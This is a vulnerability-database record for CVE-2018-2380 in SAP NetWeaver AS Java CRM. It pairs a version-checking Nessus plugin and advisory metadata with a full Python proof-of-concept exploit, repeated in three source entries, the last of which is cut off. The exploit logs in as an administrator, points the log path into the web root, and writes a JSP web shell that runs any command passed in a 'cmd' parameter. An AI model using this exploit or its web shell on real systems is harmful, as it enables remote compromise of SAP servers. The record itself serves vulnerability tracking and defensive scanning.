SAP NetWeaver AS Java Directory Traversal Vulnerability (2547431)

2021-11-05T00:00:00

Description

A directory traversal vulnerability exists in SAP Netweaver Application Server Java CRM versions before 7.01, 7.02, 7.30, 7.31, 7.33, 7.54 due to insufficient validation of path information provided by users, thus characters representing traverse to parent directory are passed through to the file APIs. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.

{"id": "SAP_NETWEAVER_AS_JAVA_2547431.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "SAP NetWeaver AS Java Directory Traversal Vulnerability (2547431)", "description": "A directory traversal vulnerability exists in SAP Netweaver Application Server Java CRM versions before 7.01, 7.02, 7.30, 7.31, 7.33, 7.54 due to insufficient validation of path information provided by users, thus characters representing traverse to parent directory are passed through to the file APIs.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-11-05T00:00:00", "modified": "2023-04-25T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/154918", "reporter": "This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://launchpad.support.sap.com/#/notes/2547431", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2380", "http://www.nessus.org/u?41b35ced"], "cvelist": ["CVE-2018-2380"], "immutableFields": [], "lastseen": "2023-05-18T15:35:16", "viewCount": 59, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:274FCE19-5C3D-4DE5-9842-C64FEEBD885E"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1791"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2018-2380"]}, {"type": "cve", "idList": ["CVE-2018-2380"]}, {"type": "exploitdb", "idList": ["EDB-ID:44292"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:95816FCBF909A16B7918E5248D27E621"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146820"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713"]}, {"type": "thn", "idList": ["THN:3C21F3359B50A4527A83BD7E63B731B2"]}, {"type": "threatpost", "idList": ["THREATPOST:4CFA3A7AC21D83FC03B1B74B2DA261BD"]}, {"type": "zdt", "idList": ["1337DAY-ID-29994"]}]}, "score": {"value": 6.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:274FCE19-5C3D-4DE5-9842-C64FEEBD885E"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1791"]}, {"type": "cve", "idList": ["CVE-2018-2380"]}, {"type": "exploitdb", "idList": ["EDB-ID:44292"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:95816FCBF909A16B7918E5248D27E621"]}, {"type": "nessus", "idList": ["SAP_NETWEAVER_AS_WEB_DETECT.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146820"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "talos", "idList": ["SAP"]}, {"type": "zdt", "idList": ["1337DAY-ID-29994"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-2380", "epss": 0.01354, "percentile": 0.84168, "modified": "2023-05-01"}], "vulnersScore": 6.8}, "_state": {"dependencies": 1684451753, "score": 1698843920, "epss": 0}, "_internal": {"score_hash": "ac90a3b340927ab41ce833cc32353055"}, "pluginID": "154918", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154918);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2018-2380\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"SAP NetWeaver AS Java Directory Traversal Vulnerability (2547431)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SAP NetWeaver AS Java server may be affected by directory traversal vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"A directory traversal vulnerability exists in SAP Netweaver Application Server Java CRM versions before 7.01, 7.02, \n7.30, 7.31, 7.33, 7.54 due to insufficient validation of path information provided by users, thus characters \nrepresenting traverse to parent directory are passed through to the file APIs.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://launchpad.support.sap.com/#/notes/2547431\");\n # https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?41b35ced\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-2380\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sap:netweaver_application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sap_netweaver_as_web_detect.nbin\");\n script_require_keys(\"installed_sw/SAP Netweaver Application Server (AS)\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443, 8000, 50000);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar app = 'SAP Netweaver Application Server (AS)';\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nvar port = get_http_port(default:443);\n\nvar app_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nvar constraints = [\n {'min_version' : '7.01', 'max_version' : '7.02', 'fixed_display' : 'See vendor advisory' },\n {'min_version' : '7.30', 'max_version' : '7.33', 'fixed_display' : 'See vendor advisory' },\n {'equal' : '7.54', 'fixed_display' : 'See vendor advisory' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);", "naslFamily": "Web Servers", "cpe": ["cpe:/a:sap:netweaver_application_server"], "solution": "Apply the appropriate patch according to the vendor advisory.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2018-2380", "vendor_cvss2": {"score": 6.5, "vector": "CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "vendor_cvss3": {"score": 6.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L"}, "vpr": {"risk factor": "Medium", "score": "5.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-03-01T00:00:00", "vulnerabilityPublicationDate": "2018-03-01T00:00:00", "exploitableWith": []}

{"attackerkb": [{"lastseen": "2023-10-18T16:42:14", "description": "SAP CRM, 7.01, 7.02,7.30, 7.31, 7.33, 7.54, allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing \u201ctraverse to parent directory\u201d are passed through to the file APIs.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.7}, "published": "2018-03-01T00:00:00", "type": "attackerkb", "title": "CVE-2018-2380", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2380"], "modified": "2023-10-06T00:00:00", "id": "AKB:274FCE19-5C3D-4DE5-9842-C64FEEBD885E", "href": "https://attackerkb.com/topics/51x89Zg3BR/cve-2018-2380", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-03-23T01:30:24", "description": "", "cvss3": {}, "published": "2018-03-14T00:00:00", "type": "packetstorm", "title": "SAP NetWeaver AS JAVA CRM Log Injection Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-2380"], "modified": "2018-03-14T00:00:00", "id": "PACKETSTORM:146820", "href": "https://packetstormsecurity.com/files/146820/SAP-NetWeaver-AS-JAVA-CRM-Log-Injection-Remote-Command-Execution.html", "sourceData": "`#!/usr/bin/env python \nimport argparse \nimport urllib \n \nimport requests, random \nfrom bs4 import BeautifulSoup \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \n \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nhelp_desc = ''' \nPoC of Remote Command Execution via Log injection on SAP CRM \n-- ERPScan \n \npython crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true \n''' \nbaner = ''' \n_______ _______ _______ _______ _______ _______ _ \n( ____ \\( ____ )( ____ )( ____ \\( ____ \\( ___ )( ( /| \n| ( \\/| ( )|| ( )|| ( \\/| ( \\/| ( ) || \\ ( | \n| (__ | (____)|| (____)|| (_____ | | | (___) || \\ | | \n| __) | __)| _____)(_____ )| | | ___ || (\\ \\) | \n| ( | (\\ ( | ( ) || | | ( ) || | \\ | \n| (____/\\| ) \\ \\__| ) /\\____) || (____/\\| ) ( || ) \\ | \n(_______/|/ \\__/|/ \\_______)(_______/|/ \\||/ )_) \nVahagn @vah_13 Vardanian \nBob @NewFranny \nCVE-2018-2380 \n \n''' \n \n \ndef start(ip, port, username, password, sid, ssl): \nif ssl == None: \nbase_scheme = 'http' \nelse: \nbase_scheme = 'https' \nreq_adapter = requests.session() \n_server_ip_port = \"{0}:{1}\".format(ip, port) \n_username = username \nadmin_password = password \n_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0\", \n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \n\"Referer\": \"{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1\".format( \nbase_scheme,_server_ip_port) \n} \n \n# shell name \n_shell_name = \"ERPScan_shell_{0}\".format(random.randint(1337, 31337)) \n \n# shell_code \nshell_code = ''' \n<%@ page import=\"java.util.*,java.io.*\"%> \n<% \nif (request.getParameter(\"cmd\") != null) { \nout.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\"); \nProcess p = Runtime.getRuntime().exec(request.getParameter(\"cmd\")); \nOutputStream os = p.getOutputStream(); \nInputStream in = p.getInputStream(); \nDataInputStream dis = new DataInputStream(in); \nString disr = dis.readLine(); \nwhile ( disr != null ) { \nout.println(disr); \ndisr = dis.readLine(); \n} \n} \n%> \n''' \n# urls variables \n_irj_portal = \"{0}://{1}/irj/portal\".format(base_scheme,_server_ip_port) \n_b2b_admin_url = \"{0}://{1}/b2b/admin/index.jsp\".format(base_scheme,_server_ip_port) \n_url_of_log_path = \"{0}://{1}/b2b/admin/logging.jsp\".format(base_scheme,_server_ip_port) \n_url_write_shell_to_log_file = \"{0}://{1}/b2b/init.do?\\\"%22]{2}[%22\\\"\".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code)) \n \n# data variable \n_post_data_restore_log_path = {\"selConfigName\": \"com.sap.isa\", \n\"selSeverity\": \"0\", \n\"selDest\": \"./default_log_name.log\", \n\"selLimit\": \"10485760\", \n\"selCount\": \"20\", \n\"selFormatterType\": \"ListFormat\", \n\"selPattern\": \"none\", \n\"mode\": \"save\", \n\"selLocationIdx\": \"1\"} \n_post_data_to_change_log_path = {\"selConfigName\": \"com.sap.isa\", \n\"selSeverity\": \"0\", \n\"selDest\": \"C:\\\\usr\\\\sap\\\\{0}\\\\J00\\\\j2ee\\\\cluster\\\\apps\\\\sap.com\\\\com.sap.engine.docs.examples\\\\servlet_jsp\\\\_default\\\\root\\\\{1}.jsp\".format(sid, _shell_name), \n\"selLimit\": \"10485760\", \n\"selCount\": \"20\", \n\"selFormatterType\": \"ListFormat\", \n\"selPattern\": \"none\", \n\"mode\": \"save\", \n\"selLocationIdx\": \"1\"} \n \nprint(\"{0} \\n[!] Try to get RCE using log injection \".format(baner)) \n \nprint(\"[!] Get j_salt token for requests\") \nres = requests.get(_irj_portal, headers=_headers, verify=False) \nsoup = BeautifulSoup(res.text, \"html.parser\") \ne = soup.find(\"input\", {\"name\": \"j_salt\"}) \n__j_salt = e['value'] \n \nprint(\"[!] Login to the SAP portal\") \nreq_adapter.post(_b2b_admin_url, \nheaders=_headers, \ndata={\"login_submit\": \"on\", \"login_do_redirect\": \"1\", \"j_salt\": __j_salt, \n\"j_username\": \"{0}\".format(_username), \"j_password\": \"{0}\".format(admin_password), \n\"uidPasswordLogon\": \"Log On\"}, verify=False) \n \nprint(\"[!] Change log path \") \nreq_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path) \n \nprint(\"[!] Upload \\\"Runtime.getRuntime().exec(request.getParameter(\\\"cmd\\\")) \\\" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig\".format(base_scheme,_server_ip_port, _shell_name)) \nreq_adapter.get(_url_write_shell_to_log_file, headers=_headers) \n \nprint(\"[!] Restore logs path to ./default_log_name.log\") \nreq_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path) \n \nprint(\"[!] Enjoy!\") \n \n \nif __name__ == \"__main__\": \nparser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter) \nparser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to') \nparser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port') \n \nparser.add_argument('-u', '--username', help='SAP CRM administrator') \nparser.add_argument('-pwd', '--password', help='SAP CRM administrator password') \n \nparser.add_argument('-s', '--SID', help='SAP SID') \nparser.add_argument('-S', '--ssl', help='Use ssl connection') \n \nargs = parser.parse_args() \nargs_dict = vars(args) \n \nhost = args_dict['host'] \nport = args_dict['port'] \nusername = args_dict['username'] \npassword = args_dict['password'] \nsid = args_dict['SID'] \nssl = args.ssl \nstart(host, port, username, password, sid, ssl) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/146820/sapnetweaverasjavacrm-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:46", "description": "\nSAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 6.6, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.7}, "published": "2018-03-14T00:00:00", "type": "exploitpack", "title": "SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2380"], "modified": "2018-03-14T00:00:00", "id": "EXPLOITPACK:95816FCBF909A16B7918E5248D27E621", "href": "", "sourceData": "#!/usr/bin/env python\nimport argparse\nimport urllib\n\nimport requests, random\nfrom bs4 import BeautifulSoup\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nhelp_desc = '''\nPoC of Remote Command Execution via Log injection on SAP CRM\n-- ERPScan\n\npython crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true\n'''\nbaner = '''\n _______ _______ _______ _______ _______ _______ _\n( ____ \\( ____ )( ____ )( ____ \\( ____ \\( ___ )( ( /|\n| ( \\/| ( )|| ( )|| ( \\/| ( \\/| ( ) || \\ ( |\n| (__ | (____)|| (____)|| (_____ | | | (___) || \\ | |\n| __) | __)| _____)(_____ )| | | ___ || (\\ \\) |\n| ( | (\\ ( | ( ) || | | ( ) || | \\ |\n| (____/\\| ) \\ \\__| ) /\\____) || (____/\\| ) ( || ) \\ |\n(_______/|/ \\__/|/ \\_______)(_______/|/ \\||/ )_)\nVahagn @vah_13 Vardanian\nBob @NewFranny\nCVE-2018-2380\n\n'''\n\n\ndef start(ip, port, username, password, sid, ssl):\n if ssl == None:\n base_scheme = 'http'\n else:\n base_scheme = 'https'\n req_adapter = requests.session()\n _server_ip_port = \"{0}:{1}\".format(ip, port)\n _username = username\n admin_password = password\n _headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Referer\": \"{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1\".format(\n base_scheme,_server_ip_port)\n }\n\n # shell name\n _shell_name = \"ERPScan_shell_{0}\".format(random.randint(1337, 31337))\n\n # shell_code\n shell_code = '''\n <%@ page import=\"java.util.*,java.io.*\"%>\n <% \n if (request.getParameter(\"cmd\") != null) {\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while ( disr != null ) {\n out.println(disr);\n disr = dis.readLine();\n } \n }\n %>\n '''\n # urls variables\n _irj_portal = \"{0}://{1}/irj/portal\".format(base_scheme,_server_ip_port)\n _b2b_admin_url = \"{0}://{1}/b2b/admin/index.jsp\".format(base_scheme,_server_ip_port)\n _url_of_log_path = \"{0}://{1}/b2b/admin/logging.jsp\".format(base_scheme,_server_ip_port)\n _url_write_shell_to_log_file = \"{0}://{1}/b2b/init.do?\\\"%22]{2}[%22\\\"\".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code))\n\n # data variable\n _post_data_restore_log_path = {\"selConfigName\": \"com.sap.isa\",\n \"selSeverity\": \"0\",\n \"selDest\": \"./default_log_name.log\",\n \"selLimit\": \"10485760\",\n \"selCount\": \"20\",\n \"selFormatterType\": \"ListFormat\",\n \"selPattern\": \"none\",\n \"mode\": \"save\",\n \"selLocationIdx\": \"1\"}\n _post_data_to_change_log_path = {\"selConfigName\": \"com.sap.isa\",\n \"selSeverity\": \"0\",\n \"selDest\": \"C:\\\\usr\\\\sap\\\\{0}\\\\J00\\\\j2ee\\\\cluster\\\\apps\\\\sap.com\\\\com.sap.engine.docs.examples\\\\servlet_jsp\\\\_default\\\\root\\\\{1}.jsp\".format(sid, _shell_name),\n \"selLimit\": \"10485760\",\n \"selCount\": \"20\",\n \"selFormatterType\": \"ListFormat\",\n \"selPattern\": \"none\",\n \"mode\": \"save\",\n \"selLocationIdx\": \"1\"}\n\n print(\"{0} \\n[!] Try to get RCE using log injection \".format(baner))\n\n print(\"[!] Get j_salt token for requests\")\n res = requests.get(_irj_portal, headers=_headers, verify=False)\n soup = BeautifulSoup(res.text, \"html.parser\")\n e = soup.find(\"input\", {\"name\": \"j_salt\"})\n __j_salt = e['value']\n\n print(\"[!] Login to the SAP portal\")\n req_adapter.post(_b2b_admin_url,\n headers=_headers,\n data={\"login_submit\": \"on\", \"login_do_redirect\": \"1\", \"j_salt\": __j_salt,\n \"j_username\": \"{0}\".format(_username), \"j_password\": \"{0}\".format(admin_password),\n \"uidPasswordLogon\": \"Log On\"}, verify=False)\n\n print(\"[!] Change log path \")\n req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path)\n\n print(\"[!] Upload \\\"Runtime.getRuntime().exec(request.getParameter(\\\"cmd\\\")) \\\" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig\".format(base_scheme,_server_ip_port, _shell_name))\n req_adapter.get(_url_write_shell_to_log_file, headers=_headers)\n\n print(\"[!] Restore logs path to ./default_log_name.log\")\n req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path)\n\n print(\"[!] Enjoy!\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to')\n parser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port')\n\n parser.add_argument('-u', '--username', help='SAP CRM administrator')\n parser.add_argument('-pwd', '--password', help='SAP CRM administrator password')\n\n parser.add_argument('-s', '--SID', help='SAP SID')\n parser.add_argument('-S', '--ssl', help='Use ssl connection')\n\n args = parser.parse_args()\n args_dict = vars(args)\n\n host = args_dict['host']\n port = args_dict['port']\n username = args_dict['username']\n password = args_dict['password']\n sid = args_dict['SID']\n ssl = args.ssl\n start(host, port, username, password, sid, ssl)", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-29T23:09:42", "description": "A remote code execution vulnerability exists in SAP NetWeaver. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 6.6, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.7}, "published": "2021-12-28T00:00:00", "type": "checkpoint_advisories", "title": "SAP NetWeaver Remote Code Execution (CVE-2018-2380)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2380"], "modified": "2021-12-28T00:00:00", "id": "CPAI-2018-1791", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-22T02:44:02", "description": "SAP CRM, 7.01, 7.02,7.30, 7.31, 7.33, 7.54, allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing \"traverse to parent directory\" are passed through to the file APIs.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.7}, "published": "2018-03-01T17:29:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2380"], "modified": "2018-03-23T16:39:00", "id": "PRION:CVE-2018-2380", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-2380", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-20T09:14:11", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2018-03-16T00:00:00", "type": "zdt", "title": "SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-2380"], "modified": "2018-03-16T00:00:00", "id": "1337DAY-ID-29994", "href": "https://0day.today/exploit/description/29994", "sourceData": "#!/usr/bin/env python\r\nimport argparse\r\nimport urllib\r\n \r\nimport requests, random\r\nfrom bs4 import BeautifulSoup\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\n \r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\nhelp_desc = '''\r\nPoC of Remote Command Execution via Log injection on SAP CRM\r\n-- ERPScan\r\n \r\npython crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true\r\n'''\r\nbaner = '''\r\n _______ _______ _______ _______ _______ _______ _\r\n( ____ \\( ____ )( ____ )( ____ \\( ____ \\( ___ )( ( /|\r\n| ( \\/| ( )|| ( )|| ( \\/| ( \\/| ( ) || \\ ( |\r\n| (__ | (____)|| (____)|| (_____ | | | (___) || \\ | |\r\n| __) | __)| _____)(_____ )| | | ___ || (\\ \\) |\r\n| ( | (\\ ( | ( ) || | | ( ) || | \\ |\r\n| (____/\\| ) \\ \\__| ) /\\____) || (____/\\| ) ( || ) \\ |\r\n(_______/|/ \\__/|/ \\_______)(_______/|/ \\||/ )_)\r\nVahagn @vah_13 Vardanian\r\nBob @NewFranny\r\nCVE-2018-2380\r\n \r\n'''\r\n \r\n \r\ndef start(ip, port, username, password, sid, ssl):\r\n if ssl == None:\r\n base_scheme = 'http'\r\n else:\r\n base_scheme = 'https'\r\n req_adapter = requests.session()\r\n _server_ip_port = \"{0}:{1}\".format(ip, port)\r\n _username = username\r\n admin_password = password\r\n _headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n \"Referer\": \"{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1\".format(\r\n base_scheme,_server_ip_port)\r\n }\r\n \r\n # shell name\r\n _shell_name = \"ERPScan_shell_{0}\".format(random.randint(1337, 31337))\r\n \r\n # shell_code\r\n shell_code = '''\r\n <%@ page import=\"java.util.*,java.io.*\"%>\r\n <% \r\n if (request.getParameter(\"cmd\") != null) {\r\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\r\n Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\r\n OutputStream os = p.getOutputStream();\r\n InputStream in = p.getInputStream();\r\n DataInputStream dis = new DataInputStream(in);\r\n String disr = dis.readLine();\r\n while ( disr != null ) {\r\n out.println(disr);\r\n disr = dis.readLine();\r\n } \r\n }\r\n %>\r\n '''\r\n # urls variables\r\n _irj_portal = \"{0}://{1}/irj/portal\".format(base_scheme,_server_ip_port)\r\n _b2b_admin_url = \"{0}://{1}/b2b/admin/index.jsp\".format(base_scheme,_server_ip_port)\r\n _url_of_log_path = \"{0}://{1}/b2b/admin/logging.jsp\".format(base_scheme,_server_ip_port)\r\n 